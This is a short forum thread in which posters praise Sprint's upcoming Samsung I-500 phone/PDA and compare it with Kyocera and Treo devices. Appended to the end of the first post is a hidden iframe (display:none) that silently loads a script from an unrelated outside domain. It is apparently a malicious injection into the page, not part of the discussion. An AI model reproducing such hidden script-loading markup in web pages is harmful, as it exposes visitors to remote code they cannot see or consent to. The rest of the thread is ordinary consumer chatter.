+ Reply to Thread

Thread: Hurry!!!

Hurry!!!

Look at this!

It's not that much bigger than an A-500. Holy crap!

Sprint can't get this thing out fast enough , IMHO.

Unless the I-500 is gonna go for more than $499, it's going to blow away the competition.

It's smaller, faster, lighter. It's Superphone!<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Master

I agree............

I agree with you! Who needs an overly thick phone with SD slot when you can have a phone and PDA in the same form factor as a phone alone!

Figuring all I need is the PDA and Phone, this is exactly what I need.

Matt

I have been a Kyocera 6035 user for two years now, and have really liked it.

So far, the Samsung 300 and Treo 300 don't have the right WOW! factor to make me switch.

I want color, and for some time, just assumed that I was going to buy the Kyocera 7135.

But as long as the 500 is out sometime between now and the end of January, I'm jumpin.

I know for power users, the SD slot is a big thing. But I really just need the thing to organize my schedule, keep my 2,000 contacts, and let me check email every once in awhile on the road.

The 500 looks excellent. Hopefully Samsung and Sprint will get it together and get it on the shelves soon.